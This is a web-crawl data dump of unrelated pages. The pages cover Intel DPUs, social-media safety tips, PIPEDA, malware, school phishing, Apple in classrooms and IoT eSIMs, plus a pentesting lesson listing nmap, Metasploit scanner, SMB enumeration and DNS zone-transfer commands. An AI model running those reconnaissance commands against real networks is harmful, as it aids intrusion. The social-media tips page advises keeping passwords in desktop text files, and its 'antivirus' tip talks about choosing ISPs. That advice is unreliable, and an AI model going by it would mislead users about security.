text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
We said this a long time ago, and we are going to say it again now. One big reason that Intel paid $16.7 billion to buy FPGA maker Altera was that it was hedging on the future of compute in the datacenter and that it could see how the hyperscalers and cloud builders might offload a lot of network, storage, and security functions from its Xeon CPU cores to devices like FPGAs. Given this, it was important to have FPGAs to catch that business, even if at reduced revenues and profits.
It has been six years since that deal went down, and our analysis of why Intel might buy Altera still stands on its merits, which we did ahead of the deal. It has perhaps taken more time for the Data Processing Unit, or DPU, to evolve from a SmartNIC, which is a network interface card with some brains on it to handle specific tasks offloaded from pricey CPU cores. Just to be different, Intel is now calling these advanced SmartNICs Infrastructure Processing Units, or IPUs, and they are distinct from CPUs, GPUs, and other XPUs like machine learning accelerators or other customer ASICs.
In the end, IPUs might have a mix of CPUs, XPUs, and other custom ASICs, in fact, based on the presentation given today by Navin Shenoy, who is general manager of the Data Platforms Group at the chip maker, at the online Six Five Summit hosted by Moor Insights and Futurum.
Let’s be frank for a second. Way back in the dawn of time, when transistors were a lot more scarce than they are today – but maybe as relatively scarce as they will soon become – the central processing unit was just that: one of a very large number of devices that managed a data processing flow across interconnected hardware. It’s called a main frame for a reason, and that is because there were lots of other frames performing dedicated tasks that were offloaded from that very expensive CPU inside that main frame. It is only with the economic benefits of decades of Moore’s Law advances from the 1960s through the 2000s that we could finally turn what we still call a CPU into something that more accurately can be thought of as a baby server-on-chip. Just about everything but main memory and auxiliary memory is now within the server CPU socket. But as Moore’s Law advances are slowing and CPU cores are expensive and can’t be wasted, the time has come to turn back the clock and offload as much of the crufty overhead from virtualized, containerized, securitized workloads from those CPU cores as possible. The DPU is not new, but represents a return to scarcity, a new twist on old ideas. (Which are the best kind.)
Shenoy did not tip Intel’s cards down too much in talking about its DPU strategy – we are not calling them IPUs until there is a consensus across all glorified SmartNIC makers to do so – but he did provide some insight into Intel’s thinking and how, in the long run the DPU that gets offloaded work should, if Jevon’s Paradox holds, result in an increase in CPU demand in the long run even if it does cause a hit in the short run.
Back in 1865 in England, William Stanley Jevons observed that as machinery was created that more efficiently burned coal for various industrial uses, coal demand did not drop, but rather increased – and importantly, increased non-linearly. This is counter-intuitive to many, but what it really showed is that there was a demand for cheap energy and high density energy that could do what muscle power or water power could not. We have some contrarian thoughts about the applicability of Jevon’s Paradox to the datacenter, which we brought up six years ago when Intel first started applying this paradox to the long term capacity needs of compute in the datacenter. There are only so many people on Earth, there are only so any hours in a day, and therefore only so much data processing that can ever need to be done. We aren’t there yet for computing overall, but certain classes of online transaction processing has been only growing at GDP rates for two decades now.
But there definitely is a kind of elasticity of demand in compute thus far, and Shenoy actually gave out some data that showed that as the cost came down, demand went up, with some exceptions where efficiencies caused a flattening in demand. The example Shenoy gave was the introduction of server virtualization on VMware platforms in the early 2000s, and combined with the dot-com bust, server shipments definitely flatlined for two years:
There are so many factors that caused the flatlining of server sales at that time that it is hard to argue virtualization on the X86 platform, which was nascent at the time with VMware just getting started with server products, was the main cause, much less the only one. Virtualization was definitely a big factor in 2008 and 2009, when the Great Recession hit and server CPUs had features added to them to accelerate virtualization hypervisors and radically cut their overhead. But that just because a built-in assumption from that point forward until containers came along in earnest about five years ago. The advent of containers and DPUs, we think, is going to push a lot of workloads back to bare metal servers and off VMs.
While counting server processors is interesting, trying to reckon server capacity is more interesting, and we have done this, as we showed in a story last week discussing Q1 2021 server sales:
It is well known that Intel is the FPGA supplier for Microsoft’s SmartNICs, and Shenoy reminded everyone of that, and also hinted that it would be delivering SmartNICs that have Xeon D processors on them, much as Amazon Web Services has multi-core Arm CPUs on its “Nitro” DPUs, which virtualize all network and storage for AWS server nodes as well as run almost all of the KVM hypervisor functions, essentially converting the CPU to a bare metal serial processor for shared applications.
Shenoy did not provide any insight into how what components and capacities these future Intel DPUs would have, but walked through the usual scenario we have heard from Mellanox/Nvidia, Fungible, Pensando, Xilinx, and others in recent years.
“We call this silicon solution a new unit of computing, the infrastructure processing unit or the IPU,” explained Shenoy. “It’s an evolution of our SmartNIC product line that when coupled with a Xeon microprocessor, will deliver highly intelligent infrastructure acceleration. And it enables new levels of system security control isolation to be delivered in a more predictable manner. FPGAs can be used to attach for workload customization and overtime these solutions become more and more tightly coupled. So blending this capability of the IPU with the ongoing trend in microservices is a unique opportunity for a function-based infrastructure to achieve more optimal hardware and software. To deal with overhead tax and more effectively orchestrate the software landscape on a complex datacenter infrastructure.”
The newsy bit is that Chinese hyperscalers Baidu and JD Cloud are working on DPUs with Intel, apparently, and the fact that Intel is working with VMware, much as Nvidia is, is no surprise at all. What is surprising is that it didn’t happen before the Nvidia deal, to be honest, and we strongly suspect it is something that Pat Gelsinger, the former CEO at VMware and the current CEO at Intel, fixed shortly after he took his new job. Nvidia is working, through Project Monterrey, to get the ESXi hypervisor ported to the Arm-based BlueField-2 line of DPUs from Nvidia, which will also have GPU acceleration for AI and hashing functions, among other things. We would not be surprised, as we have said, to see Intel buy VMware outright once Dell lets go of it later this month.
Whatever Intel is going to do with DPUs, we will find out more in October at its Intel On event, formerly known as Intel Developer Forum, which Gelsinger revived when he came back to the chip maker. | <urn:uuid:4feb927e-6201-43ac-b291-e73ce9b1c2c7> | CC-MAIN-2022-40 | https://www.nextplatform.com/2021/06/14/intel-braces-for-dpu-hit-awaits-jevons-paradox-bounce/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00401.warc.gz | en | 0.971056 | 1,727 | 2.546875 | 3 |
The use of social media is increasing day by day. Social media provide us with lots of stuff for entertainment, learning, and earning. At the same time, there are many side effects of using social media.
While using any application online, your security is exposed to the internet. You have to take some precautionary measures to secure your online presence on the internet.
If you are not following any precautionary measures, you will end up comprising your privacy. There are a lot of bad guys (hackers) available on the internet. Hackers are looking for different ways to steal your sensitive information like mobile number, credit card number, and other personal details. They can sell these details on the dark web and your data can be used for different illegal purposes without your consent.
But wait, you don’t need to worry at all. By following some tips, you can effectively secure your online presence on Facebook and other social networks. We are presenting you with the top 5 tips to stay safe on social media.
5 Tips on How to Keep Your Social Media Accounts Safe
1. Be selective with third-party applications
Third-party apps like social media post schedulers will need access to your account. Verify that only legitimate applications are granted access. Also, read the details of what you are permitting the application to access.
For example, some applications only require minimum permission to read and upload content, so always read the mini print before granting permission. Login to all of your social network accounts and see what apps you presently give access to. These links to popular social networks might help you figure out what you’re authorizing, withdraw access to anything you don’t trust or don’t use.
2. Use Strong Password
Remembering “strong” passwords can be a chore. Until he was hacked, Facebook creator Mark Zuckerberg didn’t like complex passwords.
His Twitter, Instagram, and Pinterest accounts were hacked, revealing his password as “Dadada.” This shows that most individuals don’t take password strength seriously. But you need to choose a strong password to keep your accounts secure from hackers.
There are certain tools available to check the strength of passwords but I always recommend the manual method of checking password strength. Try to use the alphabet, numbers, and special characters to set a strong password. This combination will keep your account secure from brute force attacks. For example, you can set your password as “[email protected]”.
3. Use Antivirus
Always choose the best local ISPs in your area. The local service providers don’t bother much about their security which always results in user data breaches. You can also install an antivirus tool like AVG, which has a free version. I recommend the pro version, but if your budget is tight, the free version is better than no protection at all.
4. Enable 2FA
Two-factor authentication is the best way to secure your social media accounts. If you are using this feature, hackers will not be able to log in despite he manages to steal your password. It certifies a user’s identification by using two different components, generally, the account password and a confirmation code provided through text message or email.
To be honest, ignoring this feature is asking for disaster. It’s worth the extra effort to keep your accounts safe. Here are guidelines for Facebook, Twitter, Linked In, and Instagram.
5. Store passwords Securely
Password storage is one of the main issues most internet users are facing. I always recommend storing passwords offline. When you store passwords online, you are at risk of exposing your privacy. You can store your password in an Excel sheet or notepad and store them on your desktop or hard drive.
Still, if you want to store your password online, make sure you use secret keys to store your password. Never save a Facebook password with the exact name of Facebook. You can use different keys to name the file. For example, for Facebook, you can name the file as “buukif”. This is just an example. The benefit of doing this will help you keep the Facebook password safe. Even if someone got the password file, he will not able to figure out if this password is off Facebook.
If you like this detailed article on how to keep your social media accounts safe, don’t forget to share it with the community around you. For more online security tips and guides, visit nextdoorsec.com. | <urn:uuid:0879f1ff-31f8-4911-92c6-064f1a154b51> | CC-MAIN-2022-40 | https://nextdoorsec.com/how-to-keep-your-social-media-accounts-safe/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00601.warc.gz | en | 0.908108 | 933 | 2.5625 | 3 |
Quantum encryption is the expected exponential increase in difficulty when quantum computing is applied to encoding and decoding data.
Quantum computers, while still a way off, are thought to be a threat to the encryption that today’s classical computers use. Because the former are thought to be able to perform the work of the latter in a fraction of the time, scientists are anticipating that nation states and other large, well-resourced adversaries may leverage their power to break encryption. As a response to the threat, markedly more complex quantum encryption would have to arise. The gap between when one competitor in that “crypto arms race” and the other has quantum capability is problematic for the party lacking it, since its adversary might overtake their defenses immediately.
The threat and indeed the conversation are hypothetical. Quantum computing’s power being far higher than any classical supercomputer is still an open question. In addition to quantum encryption’s threat being an unsettled science, quantum computers’ near-infeasible investments and implementation requirements make the quantum encryption war unlikely for perhaps the next decade, and one that will emerge publicly.
"Quantum computing's rise is a decade or more in the future, and limited to entities with the resources to develop and maintain it. Once it moves from the development stage and into production, we'll also see quantum encryption with exponentially more difficulty as a natural component to securing these advanced machines." | <urn:uuid:21af0d0e-ce28-4492-998b-eac4aa5e9037> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/quantum-encryption | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00601.warc.gz | en | 0.953179 | 297 | 2.890625 | 3 |
Introduction. The Personal Information Protection and Electronic Documents Act (PIPEDA) received Royal Assent on April 13, 2000, and came into force in stages, beginning on January 1, 2001. PIPEDA came fully into force on January 1, 2004.
When did the personal information Act come into effect?
PIPA was introduced in the Alberta Legislature as Bill 44 on May 14, 2003 and came into effect on January 1, 2004. PIPA has been amended by the following statutes (in chronological order of date of enactment):
Why was the Personal Information Protection and Electronic Documents Act enacted?
PIPEDA became law on 13 April 2000 to promote consumer trust in electronic commerce. … Under the Act, personal information can also be disclosed without knowledge or consent to investigations related to law enforcement, whether federal, provincial or foreign.
When did Canada’s Digital Privacy Act come into effect?
Our world has changed dramatically since Canada’s Privacy Act came into force in 1983.
What is PII in Canada?
Under PIPEDA, the following is considered sensitive or Personally Identifiable Information (PII) and is explicitly protected under the law: Age, name, ID numbers, income, ethnic origin, or blood type. Opinions, evaluations, comments, social status, or disciplinary actions.
What is the Privacy Act 1974 cover?
The Privacy Act of 1974, as amended, 5 U.S.C. The Privacy Act prohibits the disclosure of a record about an individual from a system of records absent the written consent of the individual, unless the disclosure is pursuant to one of twelve statutory exceptions. …
What is covered under the Privacy Act 1988?
The Privacy Act 1988 (Privacy Act) is the principal piece of Australian legislation protecting the handling of personal information about individuals. This includes the collection, use, storage and disclosure of personal information in the federal public sector and in the private sector.
When was PIPEDA last amended?
In April 2018, the Canadian government published an amendment to the Personal Information Protection and Electronic Documents Act (PIPEDA). The amendment, titled Breach of Security Safeguards Regulations, is effective November 1, 2018.
When did PIPEDA go into effect?
PIPEDA came into force on January 1, 2001 and was implemented in three stages. At each stage, the list of organizations required to comply with the privacy requirements of the Act expanded, with the final stage taking effect on January 1, 2004.
Is PIPEDA a statute?
The Personal Information Protection and Electronic Documents Act (PIPEDA) is the federal privacy law for private-sector organizations. It sets out the ground rules for how businesses must handle personal information in the course of their commercial activity.
What is Bill C 36 Canada?
Bill C-36, the Protection of Communities and Exploited Persons Act, received Royal Assent on November 6, 2014. Bill C-36 treats prostitution as a form of sexual exploitation that disproportionately impacts on women and girls. … Protect communities, and especially children, from the harms caused by prostitution; and.
What federal statutes have been enacted to protect privacy rights?
The key data protection statutes in Canada are: Federal: Personal Information Protection and Electronic Documents Act 2000 (‘PIPEDA’); British Columbia: Personal Information Protection Act, SBC 2003 c 63 (‘BC PIPA’); Alberta: Personal Information Protection Act, SA 2003 c P-6.5 (‘AB PIPA’); and.
What happened to Bill c11?
Bill C-11 – Digital Charter Implementation Act, 2020: An attempt to update federal privacy legislation to address online activities in particular. The bill saw a few hours of debate at second reading, but never reached committee study. … The bill was stalled repeatedly through both second reading and at committee.
Does Canada have a Hipaa?
What are the rules in Canada when it comes to patient privacy? Canada’s federal law, the Personal Information Protection and Electronic Documents Act (PIPEDA), is comparable in many ways to the Health Insurance Portability and Accountability Act (HIPAA) in the United States.
Is a cell phone number considered personal information?
Personally Identifiable Information (PII), or personal data, is data that corresponds to a single person. PII might be a phone number, national ID number, email address, or any data that can be used, either on its own or with any other information, to contact, identify, or locate a person.
What are the 8 principles of the DPA?
What Are the Eight Principles of the Data Protection Act?
- Fair and Lawful Use, Transparency. The principle of this first clause is simple. …
- Specific for Intended Purpose. …
- Minimum Data Requirement. …
- Need for Accuracy. …
- Data Retention Time Limit. …
- The right to be forgotten. …
- Ensuring Data Security. … | <urn:uuid:61828120-856f-4603-b89b-42aa0697320e> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/question-when-did-the-personal-information-protection-and-electronic-documents-act-come-into-place.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00601.warc.gz | en | 0.92182 | 1,041 | 2.984375 | 3 |
What are Malware Attacks?
The purpose of a malware attack is to install malicious software on a victim’s computer. Short for “malicious software,” malware is a file or code that can be used to conduct any type of harmful behavior the attacker designs.
How Does a Malware Attack Typically Work?
Like other types of cyber attacks, malware is disproportionately delivered through email, but can also be distributed using other methods, such as Remote Desktop Protocol (RDP) access and drive-by downloads from compromised websites. There are many kinds of malware, but most attackers use malware to infect, explore, steal, and exfiltrate data from their victims. Some of the more common types of malware distributed through email include the following:
Ransomware: Any type of extortion malware that locks your computer and demands payment in exchange for freeing your systems.
Remote Access Trojan (RAT): Malware that allows an attacker to take control of a victim’s computer.
Spyware: Malware that collects data and/or information without a person’s consent, which may include keyloggers, information stealers, or adware.
Trojan: A piece of malware that disguises itself as a legitimate application, such as a Word document or Excel spreadsheet.
Why Does Malware Bypass Traditional Email Security?
Sophisticated threat actors can couch malware in a seemingly normal email. While traditional email security can detect an obviously malicious attachment, attackers can hide the malware and trick victims into accessing it.
For example, an email may contain a legitimate-looking URL, but that URL redirects to a malicious site. Or it’s a harmless-looking document with instructions to download a form, which is in reality a malicious file. Traditional email security won’t spot anything suspicious in these emails.
Attackers can send such emails with a plausible story that tricks victims into interacting. When malware is hidden and sent alongside legitimate requests, or when it is part of a multi-step process, it can be difficult for targets to spot the danger.
How Can Modern Email Security Detect Malware?
Attackers send hidden malware alongside social engineering tactics to trick a victim into interacting with it. Modern email security can scan emails for suspicious links and attachments and detect suspicious requests that are a cornerstone of malware delivery—even when they use never-before-seen URLs.
Suspicious requests often come with manufactured urgency, and behavioral-based email security can detect these tone and context irregularities. Spoofed email addresses and rewritten URLs are also hallmarks of malware attacks that modern email security detects. When combined, these indicators provide enough insight to block these malware attacks. | <urn:uuid:37633b8c-acd3-4be8-af78-b09c279d865b> | CC-MAIN-2022-40 | https://intelligence.abnormalsecurity.com/glossary/malware | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00601.warc.gz | en | 0.899825 | 555 | 3.546875 | 4 |
Cyber Security Awareness Month: How Cyber Secure Are you?
- October 10, 2018
As of July 2018, there is a total of 4.1 billion active internet users worldwide. This shows that people across the globe are increasingly relying on the internet for literally everything. In fact, they have their confidential data saved online. As a result, we get to hear a new story regarding cyber-attacks every day.
The US Department of homeland security (DHS) and the National Cyber Security Alliance launched a cyber security awareness program in 2004. The main objective behind this campaign was to create an awareness about online safety measures among masses.
Cybersecurity attacks have affected businesses worldwide. According to statistics:
- The total number of publicly disclosed data breaches in 2017 was 1579.
- By 2021, the damage costs incurred by cybercrime is expected to hit $6 trillion.
As part of the global efforts to increase cyber security awareness, the month of October is dedicated to increasing end-user information security awareness within the organizations. Among the world’s leading providers of Information Security consultants and IT trainings, Kualitatem is also actively conducting cyber security awareness drive to help you develop critical cybersecurity skills.
Ways to Increase Cybersecurity Awareness Among Management
- Consider security initiatives as an integral part of business objectives.
- Arrange weekly meetings to discuss your present security initiatives and recent updates related to breaches.
- Using industry benchmarks and audit findings like BSIMM to demonstrate management regarding the tips to improve security measure.
- Keeping management alert about ransomware, spear-phishing, and other hacking operations targeting executives and teaching methods to avoid them.
Ways to Increase Cybersecurity Awareness Among Developers
- Demonstrate the developers to view from attacker’s point of view, via particular snippets from your own applications.
- Arrange IT security sessions with developers and let the security members explain about existing vulnerabilities. This will help them understand the developer’s perspective in terms of secure coding.
- Look at methods to make secure coding simpler for developers, such as assimilating resources and security testing in early software development lifecycle.
- Always ask developers to give feedback about how security policies align with workflows.
Ways to Increase Cybersecurity Awareness Among All Employees:
- Find security champions all across the organization, not just in the development team. This will guarantee that security messages are being followed by all employees.
- Use actual cases of breaches accomplished by phishing and social engineering targeted at non-security employees.
- Explain employees regarding risks of posting confidential information online and the ways in which it can be used against the hackers.
Kualitatem understands the significance of being cognizant and alert in the cyberspace. Our aim is to train you on identifying your role at large to mitigate potential cyber threats that come in all forms. | <urn:uuid:69073895-596f-4f79-9a27-02a0a2aa8ed8> | CC-MAIN-2022-40 | https://www.kualitatem.com/blog/cyber-security-awareness-month-cyber-secure/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00601.warc.gz | en | 0.921128 | 590 | 2.578125 | 3 |
In the final chapter of our Apple in classroom series, we hear from six more educators on ways Apple has impacted their classrooms.
Vickie S. Cook, Ph.D., Director of the University of Illinois at Springfield’s Center for Online Learning, Research and Service @DrVickieCook
Using the power of touch to teach and challenge students.
For Vickie S. Cook, director of the University of Illinois at Springfield’s Center for Online Learning, Research and Service, it’s all about using the power of touch to create a new experience for students: “Students can touch and interact with devices such as the iPhone, iPad, and Mac products using sensory perception that engages learners in new ways that teach and challenge the students. This highly visual approach allows students to engage with learning objects to build the skills needed in the 21st century.”
Apple technology has delivered educators the ability to tailor learning to individuals, groups and entire classes. This means that teachers can level the playing field for students with varying learning modality preferences, and create solid visualizations of concepts more easily. It also helps “bring learning to life anytime, anywhere, through connectivity and a highly personalized, visual environment,” she adds.
Sam Gliksman, EdTech Author, Speaker, Consultant and Owner/Blogger for EducationalMosaic.com @samgliksman
It’s not just about tech. Traditional educational paradigms are changing.
“To be absolutely clear it's far more about changing traditional educational paradigms than about any one particular device,” explains Sam Gliksman, EdTech consultant and owner/blogger of EducationalMosaic.com.
Gliksman is partial to the iPad as it allows students to engage with material in new ways. One example he offers is a field trip to a California mission where students used their iPads to capture photos, sounds and interviews. Coming back, they recorded video in front of a green screen, acting as virtual tour guides for the mission as they weaved images and sounds in and out of the video background. “Mobile devices such as iPads empower students with tools that spark creativity and innovation,” he says.
Tom Kuhlmann, Chief Learning Architect at Articulate.com @tomkuhlmann
With classroom content it’s now “pull over push.”
It's one thing for people to easily consume content as part of their learning. And mobile devices do that. But the more interesting part is that they allow the learners to create and share what they learned, says Tom Kuhlmann, chief learning architect at Articulate.com. “This ability to integrate creativity with personal learning and then share it with others not only creates a dynamic learning experience, it [also] makes it fun and engaging,” he adds.
Kuhlmann calls out the App Store and “all of the easy-to-use content creation apps” as a valuable resource that is helping change the learning and teaching dynamic from push to pull. “In the past, learning was mostly a push mechanism where the instructor pushed content out for the learner to consume. Today, the Apple devices let learners easily explore and pull content in,” says Kuhlmann. “They also allow anyone to create their own content and in turn demonstrate better understandings of what they’ve learned.”
Cory Tressler, Associate Director at the Ohio State University @TresslerTech
Mobile technology is sparking a revolution in education.
“Students, teachers, parents and administrators are all now part of a highly mobile society that has access to an incredible amount of information, collaboration tools and computing power right in the palm of their hand. Apple sparked this revolution and it has transitioned into education,” states Cory Tressler of the Ohio State University.
He is a firm believer in the iPad, describing it as “the most powerful educational technology tool ever developed,” as it provides “a mobile option for schools, teachers and students that is extremely powerful, easy to use, and enhances any learning environment.” From creating video and photos, to accessing information and research, to taking notes and writing papers, Tressler says, “it delivers any student of any age the power to do and learn instantly.”
Brianna Crowley, Teacherpreneur at The Center for Teaching Quality (CTQ) @AkaMsCrowley
The mobile device as a portal to grow student imagination.
Apple is making learning accessible through its touch interface and quality education apps, says Brianna Crowley, teacherpreneur at the Center for Teaching Quality.
From kindergarteners that cannot yet type, or high schoolers seeking individualized learning experiences, the iPad offers wonderful tools. The same goes for students with disabilities: “When a special education teacher asks for technology support for students with disabilities, I can confidently suggest an iPad because of the accessibility settings.”
Crowley loves the iPhone because it blurs the boundaries between classroom and "real world" for both herself and her students. “I love showing them how a device they used mainly for social or family communication can help them take ownership over their learning process. Showing them this helps me also reinforce the idea that learning happens everywhere, constantly,” she says. “Our devices are simply portals for our imaginations to take shape or our curiosities to be explored.”
John Wetter, Technology Services Manager at Hopkins Public Schools @johnwetter
Students constantly surprise us by what they do on their iPads.
“Look at what students are doing every day and you’ll see the transformation in learning,” says John Wetter of Hopkins Public Schools who is charged with managing over 4,000 iPads used by the district’s students.
He calls out the iPad as a transformative device in education. “Seeing an elementary student start programming with an app like Kodable, to students creating an entire movie project in iMovie on their iPad really shows the creative power unleashed in this environment,” he says. “Great teachers working with great technology to help enhance student learning, it's what we're all about.”
We’d love to hear about your experience or thoughts on technology in the classroom. If you have an idea, feel free to join the conversation by Tweeting @JAMFSoftware with your insight or story.
And as an added bonus, during the International Society for Technology in Education (ISTE) conference, we’re hosting an “Apple a Day Giveaway” Twitter contest where you could win an Apple TV. Simply tell us why or how you leverage Apple in the classroom.
Interested? Learn more about the rules and participation criteria.
Have market trends, Apple updates and Jamf news delivered directly to your inbox. | <urn:uuid:d533d504-ea31-4298-a9b2-099d0d0408f4> | CC-MAIN-2022-40 | https://www.jamf.com/blog/how-has-apple-transformed-your-classroom-part-iii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00601.warc.gz | en | 0.941198 | 1,466 | 3.078125 | 3 |
- About Us
- IT Services
- IT Security
- Cloud Services
- Who We Help
- Contact Us
As computer systems become embedded in every aspect of our lives, no one is safe from cyber attacks. Public schools are particularly vulnerable, as they store sensitive data on their students and employees but often lack the training and equipment to adequately defend it. A recent attack against the Morton School District in Illinois demonstrates just how widespread the risk is. It also serves as an example of what school districts should and should not do to prevent and respond to attacks, potentially helping other schools to keep themselves safe in the future:
Analyzing The Attack
On 31 January 2017, Russian hackers used a phishing scam to gain access to sensitive data from the Morton School District in Tazewell County, Illinois. The hackers sent an email claiming to be from Lindsey Hall, the district’s superintendent, requesting information for W2 forms. A staff member responded to the email by sending out the names, social security numbers, and salary information for 400 of the district’s employees. When the employee received another email from that address requesting more information, she became suspicious and contacted the police. Investigators determined that the email had not come from the superintendent, tracing it to Russian servers instead.
Because the district acted quickly, the potential damage from this attack is low. Although the hackers learned the social security numbers of 400 employees, they did not receive their birth dates or addresses, limiting what they can do with those figures. Authorities provided the employees who were affected by tracking applications they could use to analyze unusual activity that involved their social security numbers. Nonetheless, the fact that Russian hackers successfully stole information from an Illinois school district is unsettling, prompting concerns that other schools may be at risk.
In many ways, the Morton School District is a model for how to respond to cyber attacks. The staff quickly identified suspicious activity, contacted the authorities, and took the necessary steps to keep themselves safe. Ideally, however, school districts should never have to respond to the attack in the first place. Districts should maintain the risk of hacking to a minimum by:
Colorado Computer Support offers schools, businesses, and all other Colorado Springs institutions with valuable cyber security support. For more information on keeping yourself safe, contact firstname.lastname@example.org or (719) 355-2440 today. | <urn:uuid:b0f19f1d-f6be-4174-910e-345d7b69927f> | CC-MAIN-2022-40 | https://www.coloradosupport.com/pedagogical-phishing-understanding-the-morton-school-district-cyber-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334591.19/warc/CC-MAIN-20220925162915-20220925192915-00001.warc.gz | en | 0.961652 | 485 | 2.78125 | 3 |
Active Information Gathering
Once we have exhausted the possible ways to passively collect information about our target, we will turn to an active collection. These tools and methods are more powerful and can provide us with more information, but at the same time, they may expose you to detection. Let’s have a look at some common techniques.
Wireshark is a protocol analyzer (aka packet analyzer) and the best tool available for analyzing network traffic, and it is highly recommended that everyone become very familiar with its usage. Technically Wireshark takes packet data and gives you many ways to examine and analyze it. You are going to encounter Wireshark very often as a cyber professional, so it’s to your benefit to dive in and make yourself an expert.
Nmap is a network mapper primarily used to identify the existence of network hosts or devices, ports, services and vulnerabilities. It is the tool of choice for network enumeration and will most likely be the first tool to get detected by network defense devices. While there are ways to do this graphically, learning Nmap from the command line will really help you to better appreciate its capabilities and at the same time help you feel more accustomed to working with a command-line interface (CLI).
An ideal enumeration process is:
- Host Identification
- Port Identification
- Service Identification
- Vulnerability Identification
Yes, you can perform these tasks separately or with one command. The point is to keep your attack surface low while being accountable for your traffic. Some commands to perform these tasks are:
nmap -sn 10.0.6.200-254
nmap -v -T4 -sS -Pn --top-ports 10 10.0.6.200-254 --open
nmap -v -T4 -sT -Pn --top-ports 10 10.0.6.200-254 --open
nmap -v -T4 -sV -Pn --top-ports 25 10.0.6.200-254 --open
nmap -v -T4 -sV -sC -Pn -F 10.0.6.200-254 --open
nmap -v -T4 -A -p- 10.0.6.200-254 --open --randomize-hosts
nmap -v -T4 -p 445 --script=smb-vuln-ms10-061 10.0.6.200-254 –open
nmap -v -T4 -sU -sT -sV -p U:53,11,137,161,T:22,139,445 10.0.6.200-254 --open
Scanning with Metasploit
Although scanning with Nmap is very popular, you can also use Metasploit auxiliary modules to perform scans. Below are some examples:
- 21 auxiliary/scanner/ftp/anonymous
- 21 auxiliary/scanner/ftp/ftp_version
- 22 auxiliary/scanner/ssh/ssh_version
- 23 auxiliary/scanner/telnet/telnet_version
- 25 auxiliary/scanner/smtp/smtp_version
- 69 auxiliary/scanner/tftp/tftpbrute
- 79 auxiliary/scanner/finger/finger_users
- 80 auxiliary/scanner/http/http_version
- 110 auxiliary/scanner/pop3/pop3_version
- 111 auxiliary/scanner/misc/sunrpc_portmapper
- 123 auxiliary/scanner/ntp/ntp_monlist
- 143 auxiliary/scanner/imap/imap_version
- 512 auxiliary/scanner/rservices/rexec_login
- 513 auxiliary/scanner/rservices/rlogin_login
- 514 auxiliary/scanner/rservices/rsh_login
- 1521 auxiliary/scanner/oracle/sid_enum
- 3306 auxiliary/scanner/mysql/mysql_version
- 5432 auxiliary/scanner/postgres/postgres_version
- 5900 auxiliary/scanner/vnc/vnc_none_auth
- 6000 auxiliary/scanner/x11/open_x11
- 9100 auxiliary/scanner/printer/printer_version_info
- 50000 auxiliary/scanner/db2/db2_version
This is a command-line scan tool, running on Windows or Linux, which displays NetBIOS information. It may even display logged in users and device purpose. This is helpful when building your initial hosts and users list.
# nbtscan 10.0.6.200-254
# nbtscan -v 10.0.6.200-254
C:> nbtscan 10.0.6.0/24
# smbtree -b
# smbtree -D
# smbtree -S
enum4linux gives a multitude of information from a target machine. This can include usernames, password policies, user and group information, etc. It also shows what commands were used to get that information. This does not work all the time. A basic example of this would be:
# enum4linux 10.0.6.218
The host command can be used in many ways to identify information for a particular host or website. This is a good way to begin DNS and/or network infrastructure enumeration. For example:
# host www.facebook.com
facebook.com has address 220.127.116.11
facebook.com has IPv6 address 2a03:2880:2110:df07:face:b00c:0:1
facebook.com mail is handled by 10 msgin.t.facebook.com.
An example of a successful search for ipv6.google.com is the following:
# host ipv6.google.com
ipv6.google.com is an alias for ipv6.l.google.com.
ipv6.l.google.com has the IPv6 address: 2607:f8b0:4004:801::1004
To identify mail servers using the host command:
# host -mx cover6solutions.com
# host -t ns cover6solutions.com
Dnsrecon is one of many tools you can use to perform a zone transfer in hopes of enumerating a domain’s DNS enumeration.
# dnsrecon -d megacorpone.com -t axfr
Probably the easiest way to perform a zone transfer in Kali is to use the dnsenum tool. Keep in mind that most sites should not allow zone transfers!
# dnsenum megacorpone.com
Probably the easiest way to perform a zone transfer in Kali is to use the fierce command. Remember most sites should not allow zone transfers!! The zone file will contain a list of all the DNS names configured in that zone. Basically, it gives you the corporate network layout.
# fierce –dns cover6solutions.com
IPv6 has been out for over 21 years. It is a protocol or method of communication just like IPv4 but with over 340 undecillion more available IP addresses. How many is that? An undecillion is so large it is a 1 followed by 36 zeros! Think of it as if for every road, highway, or path that exists there is another one directly under it that not many people know about. Now add over 340 undecillion more!
Alive6 is a tool you can use to identify IPv6 hosts on the local network segment:
# atk6-alive6 -l eth0 | <urn:uuid:8265b3b8-acb8-4bb4-a192-f05f6d851089> | CC-MAIN-2022-40 | https://www.cover6solutions.com/courses/intro2cyber/lessons/active-information-gathering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334591.19/warc/CC-MAIN-20220925162915-20220925192915-00001.warc.gz | en | 0.815897 | 1,700 | 2.703125 | 3 |
As the Internet of Things continues to expand new options for IoT connectivity emerge—a brief introduction to eUICC (or eSIM) and iSIM technologies.
The Internet of Things (IoT) or IoT ecosystem refers to the use of intelligently connected devices and systems to leverage data gathered by embedded sensors and actuators in machines and other physical objects. In simple terms, it’s everything connected to the internet or cloud networking platforms—from smartphones to cities, smart meters, industrial sites, smart homes, automobiles and many other types of connected objects and environments.
Two types of connectivity for the IoT ecosystem
